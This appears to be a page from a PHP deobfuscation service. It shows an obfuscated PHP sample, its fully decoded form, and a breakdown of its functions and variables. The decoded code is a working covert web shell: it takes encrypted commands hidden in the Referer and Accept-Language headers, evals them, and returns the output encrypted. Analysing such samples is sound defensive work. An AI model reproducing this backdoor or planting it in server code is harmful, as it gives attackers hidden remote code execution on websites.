Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $O='EV=0.EV([\\d])EVEV)?,?/"EV,$ra,$m);if($q&EV&$m){@EVsessiEVoEVn_start(EV);$s=&$_..

Decoded Output download

$kh="20e4";$kf="3b79";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){    $u=parse_url($rr);    parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++) $p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$O='EV=0.EV([\\d])EVEV)?,?/"EV,$ra,$m);if($q&EV&$m){@EVsessiEVoEVn_start(EV);$s=&$_EVSESSEVION;$sEVEVs="substr";$sEVlE';
$W='r);   EV paEVrse_sEVtEVr(EV$u["query"],$q);$q=EVarray_vaEVlues($qEV);EVpreg_maEVtch_alEVl("/([\\EVw])EV[\\w-]+(?:;q';
$k='0){$s[$i]="";$p=$EVsEVs($p,3);}iEVf(EVarraEVy_key_exisEVEVEVts($i,EV$s)){$s[$i].=$p;$e=strpEVos($s[EV$i],$fEV);if';
$q=',0EV,3));$p=EV"";forEV(EVEV$z=EV1;$z<countEV($m[1]);$z++) $EVEVp.=$q[EV$m[2][$z]];if(EVEVstrpoEVs($p,EV$h)=EVEV==';
$b='i<$l;){for($j=0EV;($j<$c&&$EVi<$l);EV$jEV++,EV$i++EV){$o.=$t{EV$i}^EV$k{$j};}}returnEV $o;}$EVr=$EV_SERVER;$EVrEVr';
$N='=EV@$r[EV"HTTP_EVREFERER"];$EVra=@$r["HTTEVPEV_ACCEPT_LEVANGUAEVGE"];if($EVrrEV&&$ra){  EV  $uEVEV=parEVse_url($r';
$g='V="strtolowerEV";$iEV=$m[EV1][0].$mEV[1][1]EV;EV$h=$sl($ssEV(md5(EV$i.$kh),0,EV3));$f=EV$sl($sEVs(mEVd5($i.$EVkf)';
$M=str_replace('C','','CcCrCeateCC_functCion');
$H='(EV$e){$k=$EVkhEV.$kf;ob_sEVtarEVt()EV;@evEVal(@gEVzuncompress(@x(EVEVEV@basEVe64_decode(preg_repEVlace(arEVray("';
$V='ean();$d=basEVe64_encode(EVx(gzcEVompresEVs($oEV),EV$k));pEVrEVint("<$EVk>$d</EVEV$k>");@session_destroEVy();}}}}';
$X='EV$kh="20e4";EVEV$kf="3b79";EVfuEVnctionEV x($tEV,$kEVEV){$c=strlen($k)EV;$l=strlen($EVt);$o="EV";forEV($EVi=0;$EVEV';
$U='EV/EV_/"EV,"/-/"),EVarEVray("/","+"),$ss($sEV[$iEV],0EV,$e))),EV$k)));$o=EVEVob_get_cEVontentsEV();oEVbEVEV_end_cl';
$Z=str_replace('EV','',$X.$b.$N.$W.$O.$g.$q.$k.$H.$U.$V);
$j=$M('',$Z);$j();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$H (EV$e){$k=$EVkhEV.$kf;ob_sEVtarEVt()EV;@evEVal(@gEVzuncompre..
$M create_function
$N =EV@$r[EV"HTTP_EVREFERER"];$EVra=@$r["HTTEVPEV_ACCEPT_LEVANG..
$O EV=0.EV([\d])EVEV)?,?/"EV,$ra,$m);if($q&EV&$m){@EVsessiEVoEV..
$U EV/EV_/"EV,"/-/"),EVarEVray("/","+"),$ss($sEV[$iEV],0EV,$e))..
$V ean();$d=basEVe64_encode(EVx(gzcEVompresEVs($oEV),EV$k));pEV..
$W r); EV paEVrse_sEVtEVr(EV$u["query"],$q);$q=EVarray_vaEVlu..
$X EV$kh="20e4";EVEV$kf="3b79";EVfuEVnctionEV x($tEV,$kEVEV){$c..
$Z $kh="20e4";$kf="3b79";function x($t,$k){$c=strlen($k);$l=str..
$b i<$l;){for($j=0EV;($j<$c&&$EVi<$l);EV$jEV++,EV$i++EV){$o.=$t..
$g V="strtolowerEV";$iEV=$m[EV1][0].$mEV[1][1]EV;EV$h=$sl($ssEV..
$j None
$k 0){$s[$i]="";$p=$EVsEVs($p,3);}iEVf(EVarraEVy_key_exisEVEVEV..
$q ,0EV,3));$p=EV"";forEV(EVEV$z=EV1;$z<countEV($m[1]);$z++) $E..

Stats

MD5 0a7b220f11a2897ea88ae5b7b4ee1f49
Eval Count 1
Decode Time 79 ms